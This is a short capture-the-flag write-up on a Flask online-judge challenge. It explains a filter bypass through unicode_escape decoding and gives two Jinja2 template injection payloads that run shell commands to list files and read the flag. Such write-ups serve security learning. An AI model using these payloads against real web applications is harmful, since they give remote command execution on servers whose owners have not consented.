Code Blue CTF 2018 Quals - CODE BLUE Online Judge

CODE BLUE Online Judge

Filtering

1
2
3
tags = ['{{', '{%', '{#']
for tag in tags:
code = code.replace(tag, "{{ '%s' }}"%tag)

Vulnerability Analysis

1
2
3
4
5
6
7
8
def status_detail(uuid):
submission = Submission.query.filter_by(uuid=uuid).first()
if not submission:
abort(404)
code = render_template_string(
decrypt(submission.code, session['key']
).decode('unicode_escape'), username=session['username'])
return render_template('status_detail.html', submission=submission, code=code)

Filtering Bypass

1
2
>>> '\x7b\x7b'.decode('unicode_escape')
u'{{'

get file list

\x7b\x7b ''.__class__.__mro__[2].__subclasses__()[59]()._module.__builtins__['__import__']('os').popen('ls -al').read() }}

read flag

\x7b\x7b ''.__class__.__mro__[2].__subclasses__()[59]()._module.__builtins__['__import__']('os').popen('cat flag1').read() }}

Share